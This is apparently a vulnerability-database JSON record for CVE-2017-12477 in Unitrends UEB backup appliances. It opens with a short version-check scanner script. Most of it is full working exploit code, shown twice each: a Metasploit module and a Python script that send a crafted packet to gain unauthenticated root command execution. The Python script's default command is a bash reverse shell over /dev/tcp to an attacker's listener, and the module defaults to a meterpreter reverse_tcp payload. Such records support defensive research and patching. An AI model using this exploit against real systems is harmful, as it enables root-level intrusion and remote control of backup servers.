script_oid(\"1.3.6.1.4.1.25623.1.0.140447\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-23 15:52:55 +0700 (Mon, 23 Oct 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-12477\", \"CVE-2017-12478\", \"CVE-2017-12479\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Unitrends Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_unitrends_detect.nasl\");\n script_mandatory_keys(\"unitrends/detected\");\n\n script_tag(name:\"summary\", value:\"Unitrends UEB is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"insight\", value:\"Unitrends UEB is prone to multiple vulnerabilities:\n\n - Unauthenticated root RCE (CVE-2017-12477, CVE-2017-12478)\n\n - Authenticated lowpriv RCE (CVE-2017-12479)\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Unitrends UEB prior to version 10.0.0\");\n\n script_tag(name:\"solution\", value:\"Update to version 10.0.0 or later.\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42957/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42958/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/42959/\");\n script_xref(name:\"URL\", value:\"https://support.unitrends.com/UnitrendsBackup/s/article/000005755\");\n script_xref(name:\"URL\", value:\"https://support.unitrends.com/UnitrendsBackup/s/article/000005756\");\n script_xref(name:\"URL\", value:\"https://support.unitrends.com/UnitrendsBackup/s/article/000005757\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nif (version_is_less(version: version, test_version: \"10.0.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"10.0.0\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2017-10-23T18:30:47", "description": "Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit). CVE-2017-12477. Remote exploit for Lin_x86 platform. Tags: Metasploi...", "published": "2017-10-23T00:00:00", "type": "exploitdb", "title": "Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-10-23T00:00:00", "id": "EDB-ID:43031", "href": "https://www.exploit-db.com/exploits/43031/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::Tcp\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE',\r\n 'Description' => %q{\r\n It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\r\n has an issue in which its authentication can be bypassed. A remote attacker could use this\r\n issue to execute arbitrary commands with root privilege on the target system.\r\n },\r\n 'Author' =>\r\n [\r\n 'Jared Arave', # @iotennui\r\n 'Cale Smith', # @0xC413\r\n 'Benny Husted' # @BennyHusted\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'linux',\r\n 'Arch' => [ARCH_X86],\r\n 'CmdStagerFlavor' => [ 'printf' ],\r\n 'References' =>\r\n [\r\n ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],\r\n ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],\r\n ['CVE', '2017-12477'],\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'UEB 9.*', { } ]\r\n ],\r\n 'Privileged' => true,\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',\r\n 'SSL' => false\r\n },\r\n 'DisclosureDate' => 'Aug 8 2017',\r\n 'DefaultTarget' => 0))\r\n register_options([\r\n Opt::RPORT(1743)\r\n ])\r\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\r\n end\r\n\r\n def check\r\n s1 = connect(global = false)\r\n buf1 = s1.get_once(-1).to_s\r\n #parse out the bpd port returned\r\n bpd_port = buf1[-8..-3].to_i\r\n\r\n #check if it's a valid port number (1-65534)\r\n if bpd_port && bpd_port >= 1 && bpd_port <= 65535\r\n Exploit::CheckCode::Detected\r\n else\r\n Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n\r\n #append a comment, ignore everything after our cmd\r\n cmd = cmd + \" #\"\r\n\r\n # build the attack buffer...\r\n command_len = cmd.length + 3\r\n packet_len = cmd.length + 23\r\n data = \"\\xa5\\x52\\x00\\x2d\"\r\n data << \"\\x00\\x00\\x00\"\r\n data << packet_len\r\n data << \"\\x00\\x00\\x00\"\r\n data << \"\\x01\"\r\n data << \"\\x00\\x00\\x00\"\r\n data << \"\\x4c\"\r\n data << \"\\x00\\x00\\x00\"\r\n data << command_len\r\n data << cmd\r\n data << \"\\x00\\x00\\x00\"\r\n\r\n begin\r\n print_status(\"Connecting to xinetd for bpd port...\")\r\n s1 = connect(global = false)\r\n buf1 = s1.get_once(-1).to_s\r\n\r\n #parse out the bpd port returned, we will connect back on this port to send our cmd\r\n bpd_port = buf1[-8..-3].to_i\r\n\r\n print_good(\"bpd port recieved: #{bpd_port}\")\r\n vprint_status(\"Connecting to #{bpd_port}\")\r\n\r\n s2 = connect(global = false, opts = {'RPORT'=>bpd_port})\r\n vprint_good('Connected!')\r\n\r\n print_status('Sending command buffer to xinetd')\r\n\r\n s1.put(data)\r\n s2.get_once(-1,1).to_s\r\n\r\n disconnect(s1)\r\n disconnect(s2)\r\n\r\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\r\n fail_with(Failure::Unreachable, \"#{peer} - Connection to server failed\")\r\n end\r\n\r\n end\r\n\r\n def exploit\r\n print_status(\"#{peer} - pwn'ng ueb 9....\")\r\n execute_cmdstager(:linemax => 200)\r\n end\r\nend", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/43031/"}, {"lastseen": "2017-10-06T11:53:50", "description": "Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution. CVE-2017-12477. Remote exploit for Linux platform", "published": "2017-08-08T00:00:00", "type": "exploitdb", "title": "Unitrends UEB 9.1 - 'Unitrends bpserverd' Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-08-08T00:00:00", "id": "EDB-ID:42957", "href": "https://www.exploit-db.com/exploits/42957/", "sourceData": "# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1\r\n# Date: 08/08/2017\r\n# Exploit Authors: Jared Arave, Cale Smith, Benny Husted\r\n# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413\r\n# Vendor Homepage: https://www.unitrends.com/\r\n# Software Link: https://www.unitrends.com/download/enterprise-backup-software\r\n# Version: 9.1\r\n# Tested on: CentOS6\r\n# CVE: CVE-2017-12477\r\n\r\nimport socket\r\nimport binascii\r\nimport struct\r\nimport time\r\nimport sys\r\nfrom optparse import OptionParser\r\n\r\nprint \"\"\"\r\n###############################################################################\r\nUnauthenticated root RCE for Unitrends UEB 9.1\r\nTested against appliance versions:\r\n [+] 9.1.0-2.201611302120.CentOS6\r\n\r\nThis exploit uses roughly the same process to gain root execution\r\nas does the apache user on the Unitrends appliance. The process is\r\nsomething like this:\r\n\r\n1. Connect to xinetd process (it's usually running on port 1743)\r\n2. This process will send something like: '?A,Connect36092'\r\n3. Initiate a second connection to the port specified \r\n in the packet from xinetd (36092 in this example)\r\n4. send a specially crafted packet to xinetd, containing the \r\n command to be executed as root\r\n5. Receive command output from the connection to port 36092\r\n6. Close both connections\r\n\r\nNB: Even if you don't strictly need output from your command,\r\nThe second connection must still be made for the command\r\nto be executed at all.\r\n###############################################################################\r\n\"\"\"\r\n\r\n# Parse command line args:\r\nusage = \"Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\\n\"\\\r\n \" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'\"\r\n\r\nparser = OptionParser(usage=usage)\r\nparser.add_option(\"-r\", '--RHOST', dest='rhost', action=\"store\",\r\n help=\"Target host w/ UNITRENDS UEB installation\")\r\nparser.add_option(\"-l\", '--LHOST', dest='lhost', action=\"store\",\r\n help=\"Host listening for reverse shell connection\")\r\nparser.add_option(\"-p\", '--LPORT', dest='lport', action=\"store\",\r\n help=\"Port on which nc is listening\")\r\nparser.add_option(\"-c\", '--cmd', dest='cmd', action=\"store\",\r\n help=\"Run a custom command, no reverse shell for you.\")\r\nparser.add_option(\"-x\", '--xinetd', dest='xinetd', action=\"store\",\r\n type=\"int\", default=1743, \r\n help=\"port on which xinetd is running (default: 1743)\")\r\n\r\n(options, args) = parser.parse_args()\r\n\r\nif options.cmd:\r\n if (options.lhost or options.lport):\r\n parser.error(\"[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\\n\")\r\n\r\n elif not options.rhost:\r\n parser.error(\"[!] No remote host specified.\\n\")\r\n\r\nelif options.rhost is None or options.lhost is None or options.lport is None:\r\n parser.print_help()\r\n sys.exit(1)\r\n\r\nRHOST = options.rhost\r\nLHOST = options.lhost\r\nLPORT = options.lport\r\nXINETDPORT = options.xinetd\r\n\r\nif options.cmd:\r\n cmd = options.cmd\r\nelse:\r\n cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)\r\n\r\ndef recv_timeout(the_socket,timeout=2):\r\n the_socket.setblocking(0)\r\n total_data=[];data='';begin=time.time()\r\n while 1:\r\n #if you got some data, then break after wait sec\r\n if total_data and time.time()-begin>timeout:\r\n break\r\n #if you got no data at all, wait a little longer\r\n elif time.time()-begin>timeout*2:\r\n break\r\n try:\r\n data=the_socket.recv(8192)\r\n if data:\r\n total_data.append(data)\r\n begin=time.time()\r\n else:\r\n time.sleep(0.1)\r\n except:\r\n pass\r\n return ''.join(total_data)\r\n\r\nprint \"[+] attempting to connect to xinetd on {0}:{1}\".format(RHOST, str(XINETDPORT))\r\n\r\ntry:\r\n s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s1.connect((RHOST,XINETDPORT))\r\nexcept:\r\n print \"[!] Failed to connect!\"\r\n exit()\r\n\r\ndata = s1.recv(4096)\r\nbpd_port = int(data[-8:-3])\r\n\r\nprint \"[+] Connected! Cmd output will come back on {}:{}\".format(RHOST, str(bpd_port))\r\nprint \"[+] Connecting to bpdserverd on {}:{}\".format(RHOST, str(bpd_port))\r\n\r\ntry:\r\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s2.connect((RHOST, bpd_port))\r\nexcept:\r\n print \"[!] Failed to connect!\"\r\n s1.close()\r\n exit()\r\n\r\nprint \"[+] Connected! Sending the following cmd to {0}:{1}\".format(RHOST,str(XINETDPORT))\r\nprint \"[+] '{0}'\".format(cmd)\r\n\r\nif (len(cmd) > 240):\r\n print \"[!] This command is long; this might not work.\"\r\n print \"[!] Maybe try a shorter command...\"\r\n\r\ncmd_len = chr(len(cmd) + 3)\r\npacket_len = chr(len(cmd) + 23)\r\n\r\npacket = '\\xa5\\x52\\x00\\x2d'\r\npacket += '\\x00' * 3\r\npacket += packet_len\r\npacket += '\\x00' * 3\r\npacket += '\\x01'\r\npacket += '\\x00' * 3\r\npacket += '\\x4c'\r\npacket += '\\x00' * 3\r\npacket += cmd_len\r\npacket += cmd\r\npacket += '\\x00' * 3\r\n\r\ns1.send(packet)\r\n\r\nprint \"[+] cmd packet sent!\"\r\nprint \"[+] Waiting for response from {0}:{1}\".format(RHOST,str(bpd_port))\r\n\r\ndata = recv_timeout(s2)\r\n\r\nprint \"[+] Here's the output -> \\n\\n\"\r\n\r\nprint data\r\n\r\nprint \"[+] Closing ports, exiting....\"\r\n\r\ns1.close()\r\ns2.close()\r\n\r\n# 3. Solution:\r\n# Update to Unitrends UEB 10\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42957/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:52", "description": "\nUnitrends UEB 9.1 - Unitrends bpserverd Remote Command Execution", "edition": 1, "published": "2017-08-08T00:00:00", "title": "Unitrends UEB 9.1 - Unitrends bpserverd Remote Command Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "2017-08-08T00:00:00", "id": "EXPLOITPACK:01C4F1CC72C2FAFAB4808FA12E255393", "href": "", "sourceData": "# Exploit Title: Unauthenticated root RCE for Unitrends UEB 9.1\n# Date: 08/08/2017\n# Exploit Authors: Jared Arave, Cale Smith, Benny Husted\n# Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413\n# Vendor Homepage: https://www.unitrends.com/\n# Software Link: https://www.unitrends.com/download/enterprise-backup-software\n# Version: 9.1\n# Tested on: CentOS6\n# CVE: CVE-2017-12477\n\nimport socket\nimport binascii\nimport struct\nimport time\nimport sys\nfrom optparse import OptionParser\n\nprint \"\"\"\n###############################################################################\nUnauthenticated root RCE for Unitrends UEB 9.1\nTested against appliance versions:\n [+] 9.1.0-2.201611302120.CentOS6\n\nThis exploit uses roughly the same process to gain root execution\nas does the apache user on the Unitrends appliance. The process is\nsomething like this:\n\n1. Connect to xinetd process (it's usually running on port 1743)\n2. This process will send something like: '?A,Connect36092'\n3. Initiate a second connection to the port specified \n in the packet from xinetd (36092 in this example)\n4. send a specially crafted packet to xinetd, containing the \n command to be executed as root\n5. Receive command output from the connection to port 36092\n6. Close both connections\n\nNB: Even if you don't strictly need output from your command,\nThe second connection must still be made for the command\nto be executed at all.\n###############################################################################\n\"\"\"\n\n# Parse command line args:\nusage = \"Usage: %prog -r <appliance_ip> -l <listener_ip> -p <listener_port>\\n\"\\\n \" %prog -r <appliance_ip> -c 'touch /tmp/foooooooooooo'\"\n\nparser = OptionParser(usage=usage)\nparser.add_option(\"-r\", '--RHOST', dest='rhost', action=\"store\",\n help=\"Target host w/ UNITRENDS UEB installation\")\nparser.add_option(\"-l\", '--LHOST', dest='lhost', action=\"store\",\n help=\"Host listening for reverse shell connection\")\nparser.add_option(\"-p\", '--LPORT', dest='lport', action=\"store\",\n help=\"Port on which nc is listening\")\nparser.add_option(\"-c\", '--cmd', dest='cmd', action=\"store\",\n help=\"Run a custom command, no reverse shell for you.\")\nparser.add_option(\"-x\", '--xinetd', dest='xinetd', action=\"store\",\n type=\"int\", default=1743, \n help=\"port on which xinetd is running (default: 1743)\")\n\n(options, args) = parser.parse_args()\n\nif options.cmd:\n if (options.lhost or options.lport):\n parser.error(\"[!] Options --cmd and [--LHOST||--LPORT] are mutually exclusive.\\n\")\n\n elif not options.rhost:\n parser.error(\"[!] No remote host specified.\\n\")\n\nelif options.rhost is None or options.lhost is None or options.lport is None:\n parser.print_help()\n sys.exit(1)\n\nRHOST = options.rhost\nLHOST = options.lhost\nLPORT = options.lport\nXINETDPORT = options.xinetd\n\nif options.cmd:\n cmd = options.cmd\nelse:\n cmd = 'bash -i >& /dev/tcp/{0}/{1} 0>&1 &'.format(LHOST, LPORT)\n\ndef recv_timeout(the_socket,timeout=2):\n the_socket.setblocking(0)\n total_data=[];data='';begin=time.time()\n while 1:\n #if you got some data, then break after wait sec\n if total_data and time.time()-begin>timeout:\n break\n #if you got no data at all, wait a little longer\n elif time.time()-begin>timeout*2:\n break\n try:\n data=the_socket.recv(8192)\n if data:\n total_data.append(data)\n begin=time.time()\n else:\n time.sleep(0.1)\n except:\n pass\n return ''.join(total_data)\n\nprint \"[+] attempting to connect to xinetd on {0}:{1}\".format(RHOST, str(XINETDPORT))\n\ntry:\n s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s1.connect((RHOST,XINETDPORT))\nexcept:\n print \"[!] Failed to connect!\"\n exit()\n\ndata = s1.recv(4096)\nbpd_port = int(data[-8:-3])\n\nprint \"[+] Connected! Cmd output will come back on {}:{}\".format(RHOST, str(bpd_port))\nprint \"[+] Connecting to bpdserverd on {}:{}\".format(RHOST, str(bpd_port))\n\ntry:\n s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s2.connect((RHOST, bpd_port))\nexcept:\n print \"[!] Failed to connect!\"\n s1.close()\n exit()\n\nprint \"[+] Connected! Sending the following cmd to {0}:{1}\".format(RHOST,str(XINETDPORT))\nprint \"[+] '{0}'\".format(cmd)\n\nif (len(cmd) > 240):\n print \"[!] This command is long; this might not work.\"\n print \"[!] Maybe try a shorter command...\"\n\ncmd_len = chr(len(cmd) + 3)\npacket_len = chr(len(cmd) + 23)\n\npacket = '\\xa5\\x52\\x00\\x2d'\npacket += '\\x00' * 3\npacket += packet_len\npacket += '\\x00' * 3\npacket += '\\x01'\npacket += '\\x00' * 3\npacket += '\\x4c'\npacket += '\\x00' * 3\npacket += cmd_len\npacket += cmd\npacket += '\\x00' * 3\n\ns1.send(packet)\n\nprint \"[+] cmd packet sent!\"\nprint \"[+] Waiting for response from {0}:{1}\".format(RHOST,str(bpd_port))\n\ndata = recv_timeout(s2)\n\nprint \"[+] Here's the output -> \\n\\n\"\n\nprint data\n\nprint \"[+] Closing ports, exiting....\"\n\ns1.close()\ns2.close()\n\n# 3. Solution:\n# Update to Unitrends UEB 10", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-15T10:08:22", "description": "It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd, has an issue in which its authentication can be bypassed. A remote attacker could use this issue to execute arbitrary commands with root privilege on the target system.\n", "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Unitrends UEB bpserverd authentication bypass RCE", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-12477"], "modified": "1976-01-01T00:00:00", "id": "MSF:EXPLOIT/LINUX/MISC/UEB9_BPSERVERD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Unitrends UEB bpserverd authentication bypass RCE',\n 'Description' => %q{\n It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,\n has an issue in which its authentication can be bypassed. A remote attacker could use this\n issue to execute arbitrary commands with root privilege on the target system.\n },\n 'Author' =>\n [\n 'Jared Arave', # @iotennui\n 'Cale Smith', # @0xC413\n 'Benny Husted' # @BennyHusted\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86],\n 'CmdStagerFlavor' => [ 'printf' ],\n 'References' =>\n [\n ['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],\n ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],\n ['CVE', '2017-12477'],\n ],\n 'Targets' =>\n [\n [ 'UEB 9.*', { } ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',\n 'SSL' => false\n },\n 'DisclosureDate' => '2017-08-08',\n 'DefaultTarget' => 0))\n register_options([\n Opt::RPORT(1743)\n ])\n deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')\n end\n\n def check\n s1 = connect(global = false)\n buf1 = s1.get_once(-1).to_s\n #parse out the bpd port returned\n bpd_port = buf1[-8..-3].to_i\n\n #check if it's a valid port number (1-65534)\n if bpd_port && bpd_port >= 1 && bpd_port <= 65535\n Exploit::CheckCode::Detected\n else\n Exploit::CheckCode::Safe\n end\n end\n\n def execute_command(cmd, opts = {})\n\n #append a comment, ignore everything after our cmd\n cmd = cmd + \" #\"\n\n # build the attack buffer...\n command_len = cmd.length + 3\n packet_len = cmd.length + 23\n data = \"\\xa5\\x52\\x00\\x2d\"\n data << \"\\x00\\x00\\x00\"\n data << packet_len\n data << \"\\x00\\x00\\x00\"\n data << \"\\x01\"\n data << \"\\x00\\x00\\x00\"\n data << \"\\x4c\"\n data << \"\\x00\\x00\\x00\"\n data << command_len\n data << cmd\n data << \"\\x00\\x00\\x00\"\n\n begin\n print_status(\"Connecting to xinetd for bpd port...\")\n s1 = connect(global = false)\n buf1 = s1.get_once(-1).to_s\n\n #parse out the bpd port returned, we will connect back on this port to send our cmd\n bpd_port = buf1[-8..-3].to_i\n\n print_good(\"bpd port received: #{bpd_port}\")\n vprint_status(\"Connecting to #{bpd_port}\")\n\n s2 = connect(global = false, opts = {'RPORT'=>bpd_port})\n vprint_good('Connected!')\n\n print_status('Sending command buffer to xinetd')\n\n s1.put(data)\n s2.get_once(-1,1).to_s\n\n disconnect(s1)\n disconnect(s2)\n\n rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e\n fail_with(Failure::Unreachable, \"#{peer} - Connection to server failed\")\n end\n\n end\n\n def exploit\n print_status(\"#{peer} - pwn'ng ueb 9....\")\n execute_cmdstager(:linemax => 200)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ueb9_bpserverd.rb"}]}
